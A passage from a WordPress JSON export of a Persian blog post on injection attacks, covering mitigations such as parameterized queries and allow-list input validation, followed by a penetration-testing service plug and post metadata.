\u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u0628\u0648\u062f\u0646 \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u0647\u0627 \u0645\u06cc\u200c\u0634\u0648\u06cc\u0645 \u06a9\u0647 \u062a\u0648\u062c\u0647 \u0628\u0647 \u0627\u06cc\u0646 \u062f\u0644\u0627\u06cc\u0644\u060c \u062f\u0631 \u062a\u0639\u06cc\u06cc\u0646 \u0631\u0627\u0647\u06a9\u0627\u0631\u200c\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0628\u0631\u0627\u06cc \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u062d\u0645\u0644\u0627\u062a \u0645\u0627 \u06a9\u0645\u06a9 \u0645\u06cc\u200c\u06a9\u0646\u062f. \u062a\u0639\u062f\u0627\u062f\u06cc \u0627\u0632 \u0631\u0627\u0647\u06a9\u0627\u0631\u200c\u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0628\u0631\u0627\u06cc \u067e\u06cc\u0634\u06af\u06cc\u0631\u06cc \u06a9\u0644\u06cc \u0627\u0632 \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 \u0634\u0627\u0645\u0644 \u0645\u0648\u0627\u0631\u062f \u0632\u06cc\u0631 \u0645\u06cc\u200c\u0634\u0648\u0646\u062f:<\/p>\n<h4><strong>\u067e\u0627\u0631\u0627\u0645\u062a\u0631 \u0633\u0627\u0632\u06cc<\/strong><\/h4>\n<p>\u0627\u06af\u0631 \u0627\u0645\u06a9\u0627\u0646 \u0622\u0646 \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u062f\u060c \u0627\u0632 \u0645\u06a9\u0627\u0646\u06cc\u0632\u0645\u200c\u0647\u0627\u06cc \u0633\u0627\u062e\u062a\u0627\u0631 \u06cc\u0627\u0641\u062a\u0647\u200c\u0627\u06cc \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u06cc\u062f \u06a9\u0647 \u0628\u0647 \u0637\u0648\u0631 \u062e\u0648\u062f\u06a9\u0627\u0631\u060c \u062a\u0641\u06a9\u06cc\u06a9 \u0628\u06cc\u0646 \u062f\u0627\u062f\u0647 \u0648 \u0641\u0631\u0645\u0627\u0646 \u0631\u0627 \u0627\u0639\u0645\u0627\u0644 \u0645\u06cc\u200c\u06a9\u0646\u0646\u062f.<\/p>\n<h4><strong>\u0627\u0639\u0628\u0627\u0631 \u0633\u0646\u062c\u06cc \u0648\u0631\u0648\u062f\u06cc<\/strong><\/h4>\n<p>\u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0648 \u0622\u0631\u06af\u0648\u0645\u0627\u0646\u200c\u0647\u0627\u06cc\u06cc \u06a9\u0647 \u062a\u0648\u0633\u0637 \u06a9\u0627\u0631\u0628\u0631 \u0642\u0627\u0628\u0644 \u062a\u063a\u06cc\u06cc\u0631\u0627\u0646\u062f \u0628\u0627\u06cc\u062f \u0627\u0639\u062a\u0628\u0627\u0631 \u0633\u0646\u062c\u06cc \u0634\u0648\u0646\u062f. \u062f\u0631 \u0627\u06cc\u0646\u062c\u0627 \u062f\u0631\u062c\u0627\u062a \u0645\u062e\u062a\u0644\u0641\u06cc \u0627\u0632 \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u0628\u0631\u0627\u06cc \u062f\u0633\u062a\u0648\u0631 \u0648\u0627\u0642\u0639\u06cc \u0648 \u0622\u0631\u06af\u0648\u0645\u0627\u0646\u200c\u0647\u0627\u06cc \u0622\u0646 \u0648\u062c\u0648\u062f \u062f\u0627\u0631\u062f:<\/p>\n<ol>\n<li>\u0648\u0642\u062a\u06cc \u0627\u0632 \u06cc\u06a9 \u062f\u0633\u062a\u0648\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f\u060c \u0628\u0627\u06cc\u062f \u0637\u0628\u0642 \u06cc\u06a9 \u0644\u06cc\u0633\u062a \u0627\u0632 \u062f\u0633\u062a\u0648\u0631\u0627\u062a \u0645\u062c\u0627\u0632 (Alow-List) \u0627\u0639\u062a\u0628\u0627\u0631 \u0633\u0646\u062c\u06cc \u0628\u0647 \u0639\u0645\u0644 \u0628\u06cc\u0627\u06cc\u062f.<\/li>\n<li>\u0622\u0631\u06af\u0648\u0645\u0627\u0646\u200c\u0647\u0627\u06cc \u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647\u060c \u0628\u0627\u06cc\u062f \u0637\u0628\u0642 \u06cc\u06a9 \u0644\u06cc\u0633\u062a \u0645\u062c\u0627\u0632 \u0627\u0639\u062a\u0628\u0627\u0631\u0633\u0646\u062c\u06cc \u0634\u0648\u0646\u062f \u060c \u0637\u0648\u0644 \u0631\u0634\u062a\u0647 \u062f\u0631 \u062d\u062f \u0645\u062c\u0627\u0632 \u0628\u0627\u0634\u062f \u0648 \u0627\u0632 \u06a9\u0627\u0631\u0627\u06a9\u062a\u0631\u200c\u0647\u0627\u06cc \u0646\u0627\u0645\u0631\u0628\u0648\u0637 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0646\u0634\u0648\u062f.<\/li>\n<\/ol>\n<p><strong>\u0648 \u062f\u0631 \u0627\u0646\u062a\u0647\u0627&#8230;<\/strong><\/p>\n<p>\u0647\u0645\u0627\u0646\u0637\u0648\u0631 \u06a9\u0647 \u0645\u062e\u062a\u0635\u0631\u0627 \u0628\u0647 \u0645\u0631\u0648\u0631 \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642 \u067e\u0631\u062f\u0627\u062e\u062a\u06cc\u0645\u060c \u0645\u062a\u0648\u062c\u0647 \u0634\u062f\u06cc\u0645 \u06a9\u0647 \u0628\u0631\u0627\u06cc \u062f\u0627\u0634\u062a\u0646 \u06cc\u06a9 \u0628\u0631\u0646\u0627\u0645\u0647\u200c\u06cc \u0648\u0628 \u0627\u0645\u0646\u060c \u062f\u0631 \u0628\u0631\u0627\u0628\u0631 \u062d\u0645\u0644\u0627\u062a \u0645\u062e\u062a\u0644\u0641\u060c \u0645\u062e\u0635\u0648\u0635\u0627\u064b \u062d\u0645\u0644\u0627\u062a \u062a\u0632\u0631\u06cc\u0642\u060c \u0646\u06cc\u0627\u0632 \u0627\u0633\u062a \u06a9\u0647 \u0628\u0647 \u0648\u0631\u0648\u062f\u06cc\u200c\u0647\u0627\u06cc \u062f\u0631 \u062f\u0633\u062a\u0631\u0633 \u06a9\u0627\u0631\u0628\u0631\u060c \u062f\u0631 \u062c\u0647\u062a \u0627\u0639\u062a\u0628\u0627\u0631 \u0633\u0646\u062c\u06cc \u0622\u0646\u060c \u062a\u0648\u062c\u0647 \u0648\u06cc\u0698\u0647\u200c\u0627\u06cc \u062f\u0627\u0634\u062a \u0648 \u062f\u0631 \u062c\u0647\u062a \u0627\u0645\u0646\u200c\u0633\u0627\u0632\u06cc \u0622\u0646\u0647\u0627 \u06a9\u0648\u0634\u0627 \u0628\u0627\u0634\u06cc\u0645\u061b\u0632\u06cc\u0631\u0627 \u0647\u0645\u0627\u0646\u0637\u0648\u0631 \u06a9\u0647 \u062f\u06cc\u062f\u06cc\u0645\u060c \u06af\u0627\u0647\u0627\u064b \u0648\u062c\u0648\u062f \u06cc\u06a9 \u0646\u0642\u0637\u0647\u200c\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631 \u062f\u0631 \u0628\u0631\u0646\u0627\u0645\u0647\u060c \u0628\u0627\u0639\u062b \u0627\u06cc\u062c\u0627\u062f \u06cc\u06a9 \u062d\u0645\u0644\u0647 \u0634\u062f\u0647 \u0648 \u0628\u0647 \u0648\u0627\u0633\u0637\u0647\u200c\u06cc \u0622\u0646 \u062d\u0645\u0644\u0647\u060c \u062f\u0631\u06cc\u0686\u0647\u200c\u0627\u06cc \u0628\u0631\u0627\u06cc \u0627\u062c\u0631\u0627\u06cc \u062d\u0645\u0644\u0627\u062a \u062f\u06cc\u06af\u0631 \u0646\u06cc\u0632 \u0627\u06cc\u062c\u0627\u062f \u0645\u06cc\u200c\u0634\u0648\u062f.<\/p>\n<div class=\"bs-shortcode-alert alert alert-info\">\n<p><b>\u0647\u0645\u0686\u0646\u06cc\u0646 \u0634\u0631\u06a9\u062a \u0631\u0627\u0647\u0628\u0631\u0627\u0646 \u0641\u0646\u0627\u0648\u0631\u06cc \u067e\u0627\u0633\u0627\u0631\u06af\u0627\u062f \u062e\u062f\u0645\u0627\u062a\u06cc \u0631\u0627 \u062f\u0631 \u0631\u0627\u0633\u062a\u0627\u06cc \u0627\u0645\u0646 \u0633\u0627\u0632\u06cc \u0633\u06cc\u0633\u062a\u0645\u200c\u0647\u0627\u06cc \u062a\u062d\u062a \u0648\u0628 \u0627\u0631\u0627\u0626\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f. \u0628\u0631\u0627\u06cc \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0628\u06cc\u0634\u062a\u0631 <a href=\"https:\/\/www.irandnn.ir\/solutions\/penetration-testing\">\u06a9\u0644\u06cc\u06a9 \u0646\u0645\u0627\u06cc\u06cc\u062f<\/a>.\u00a0<\/b><\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p><span class=\"span-reading-time rt-reading-time\" style=\"display: block;\"><span class=\"rt-label rt-prefix\">\u0632\u0645\u0627\u0646 \u0645\u0637\u0627\u0644\u0639\u0647:<\/span> <span class=\"rt-time\"> 10<\/span> <span class=\"rt-label rt-postfix\">\u062f\u0642\u06cc\u0642\u0647<\/span><\/span>\u062d\u0645\u0644\u0627\u062a Injection \u06cc\u0627 \u062a\u0632\u0631\u06cc\u0642\u060c \u0627\u0632 \u062c\u0645\u0644\u0647 \u062d\u0645\u0644\u0627\u062a \u0645\u0639\u0631\u0648\u0641 \u0648 \u0634\u0646\u0627\u062e\u062a\u0647 \u0634\u062f\u0647\u200c\u0627\u06cc \u0645\u06cc\u200c\u0628\u0627\u0634\u0646\u062f \u06a9\u0647 \u062a\u0627\u06a9\u0646\u0648\u0646\u060c \u0648\u0628\u200c\u0633\u0627\u06cc\u062a\u200c\u0647\u0627\u06cc \u0632\u06cc\u0627\u062f\u06cc \u0631\u0627 \u062a\u062d\u062a \u062a\u0627\u062b\u06cc\u0631 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f\u0647 \u0627\u0646\u062f. \u062d\u0645\u0644\u0627\u062a\u06cc \u06a9\u0647 \u0637\u0628\u0642 \u0622\u0645\u0627\u0631 \u0634\u0631\u06a9\u062a OWASP\u060c \u0633\u0627\u0644\u200c\u0647\u0627\u06cc \u0632\u06cc\u0627\u062f\u06cc \u0627\u0633\u062a \u06a9\u0647 \u062f\u0631 \u0644\u06cc\u0633\u062a \u067e\u0631 \u0631\u062e\u062f\u0627\u062f\u200c\u062a\u0631\u06cc\u0646 \u062d\u0645\u0644\u0627\u062a \u062a\u062d\u062a \u0648\u0628\u060c \u0642\u0631\u0627\u0631 \u06af\u0631\u0641\u062a\u0647\u200c\u0627\u0646\u062f.<\/p>\n","protected":false},"author":5,"featured_media":4448,"comment_status":"open","ping_status":"open","sticky":true,"template":"","format":"standard","meta":{"footnotes":""},"categories":[75],"tags":[93],"better_featured_image":{"id":4448,"alt_text":"","caption":"","description":"","media_type":"image","media_details":{"width":1000,"height":700,"file":"2021\/10\/shakhes-4.jpg","sizes":{"medium":{"file":"shakhes-4-300x210.jpg","width":300,"height":210,"mime-type":"image\/jpeg","source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4-300x210.jpg"},"thumbnail":{"file":"shakhes-4-150x150.jpg","width":150,"height":150,"mime-type":"image\/jpeg","source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4-150x150.jpg"},"medium_large":{"file":"shakhes-4-768x538.jpg","width":768,"height":538,"mime-type":"image\/jpeg","source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4-768x538.jpg"},"publisher-tb1":{"file":"shakhes-4-86x64.jpg","width":86,"height":64,"mime-type":"image\/jpeg","source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4-86x64.jpg"},"publisher-sm":{"file":"shakhes-4-210x136.jpg","width":210,"height":136,"mime-type":"image\/jpeg","source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4-210x136.jpg"},"publisher-mg2":{"file":"shakhes-4-279x220.jpg","width":279,"height":220,"mime-type":"image\/jpeg","source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4-279x220.jpg"},"publisher-md":{"file":"shakhes-4-357x210.jpg","width":357,"height":210,"mime-type":"image\/jpeg","source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4-357x210.jpg"},"publisher-lg":{"file":"shakhes-4-750x430.jpg","width":750,"height":430,"mime-type":"image\/jpeg","source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4-750x430.jpg"},"publisher-full":{"file":"shakhes-4-1000x580.jpg","width":1000,"height":580,"mime-type":"image\/jpeg","source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4-1000x580.jpg"},"publisher-tall-sm":{"file":"shakhes-4-180x217.jpg","width":180,"height":217,"mime-type":"image\/jpeg","source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4-180x217.jpg"},"publisher-tall-lg":{"file":"shakhes-4-267x322.jpg","width":267,"height":322,"mime-type":"image\/jpeg","source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4-267x322.jpg"},"publisher-tall-big":{"file":"shakhes-4-368x445.jpg","width":368,"height":445,"mime-type":"image\/jpeg","source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4-368x445.jpg"}},"image_meta":{"aperture":"0","credit":"","camera":"","caption":"","created_timestamp":"0","copyright":"","focal_length":"0","iso":"0","shutter_speed":"0","title":"","orientation":"1","keywords":[]}},"post":4438,"source_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4.jpg"},"fimg_url":"https:\/\/www.irandnn.ir\/mag\/wp-content\/uploads\/2021\/10\/shakhes-4.jpg","_links":{"self":[{"href":"https:\/\/www.irandnn.ir\/mag\/wp-json\/wp\/v2\/posts\/4438"}],"collection":[{"href":"https:\/\/www.irandnn.ir\/mag\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.irandnn.ir\/mag\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.irandnn.ir\/mag\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/www.irandnn.ir\/mag\/wp-json\/wp\/v2\/comments?post=4438"}],"version-history":[{"count":13,"href":"https:\/\/www.irandnn.ir\/mag\/wp-json\/wp\/v2\/posts\/4438\/revisions"}],"predecessor-version":[{"id":5369,"href":"https:\/\/www.irandnn.ir\/mag\/wp-json\/wp\/v2\/posts\/4438\/revisions\/5369"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.irandnn.ir\/mag\/wp-json\/wp\/v2\/media\/4448"}],"wp:attachment":[{"href":"https:\/\/www.irandnn.ir\/mag\/wp-json\/wp\/v2\/media?parent=4438"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.irandnn.ir\/mag\/wp-json\/wp\/v2\/categories?post=4438"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.irandnn.ir\/mag\/wp-json\/wp\/v2\/tags?post=4438"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}